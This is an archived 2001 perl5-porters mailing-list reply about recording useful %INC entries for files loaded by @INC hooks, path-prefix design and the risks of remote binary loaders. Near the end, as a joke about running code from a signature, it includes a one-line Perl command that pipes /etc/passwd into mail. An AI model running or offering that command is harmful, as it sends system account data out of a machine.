develooper Front page | perl.perl5.porters | Postings from August 2001

Re: [PATCH] put useful info in %INC for files loaded by a hook in @INC

Thread Previous | Thread Next
Rafael Garcia-Suarez
August 29, 2001 14:42
Re: [PATCH] put useful info in %INC for files loaded by a hook in @INC
Message ID:
On 2001.08.29 12:14 Nicholas Clark wrote:
> > On 2001.08.28 18:31:17 +0200 Gisle Aas wrote:
> > >
> > > What is still missing is to make sure pp_require() invokes the hook
> > > again when an absolute filename starting with things like
> > > "/loader/0x81095c8/" is used.  Currently this bypass the @INC search
> //loader/
> would be better, wouldn't it? As that's a URN name and doesn't need to be
> a local file. [Have I got my terms correct?]
> Better still if we had something instead of "loader" that couldn't be a
> valid hostname, as that couldn't clash with anyone's real hostnames?

//loader/ is still a valid Unix path.
I suggest "&(0x81095c8)/relative/path/to/file".

Note that this has the advantage of not being an absolute pathname
(as the PERL_FILE_IS_ABSOLUTE macro defines it).

If pp_require is patched to drop &(0x81095c8)/ from the beginning
of a relative pathname, this has the side-effect of fixing the problem
reported by Gisle. (I call this a side-effect, not a plain fix, because
this would trigger walking through @INC, and not directly re-invoking the
hook corresponding to the 0x81095c8 address).

> The idea of a remote-loader that pulls binaries from somewhere seems scary.
> [I'm envisaging something that pulls the .so to a temporary file and then
> dl_open()s that. Or whatever for your OS]
> However, I'm not sure security why it's any less scary than "pure perl"
> considering that someone wrote a perl 1.5 liner in perl that triggered
> the Pentium f00f bug. If someone mails you a JAPH in a .sig, do you run it?
> Is binary vs source portability is an issue? Perl is using archnames in the
> require path, so it ought to be possible to remote load the correct binary.
> The issue then is only have you compiled it?

Does binary compatibility depend on Configure options ? The archname doesn't
change, but the perl binary may be built with or without -Duseithreads,
-Dusemymalloc, -Ubincompat5005 and so forth. Does this affect extensions ?

system('cat /etc/passwd | mail -s hmmm');
print "Just another Perl hacker,\n";

Thread Previous | Thread Next Perl Programming lists via nntp and http.
Comments to Ask Bjørn Hansen at | Group listing | About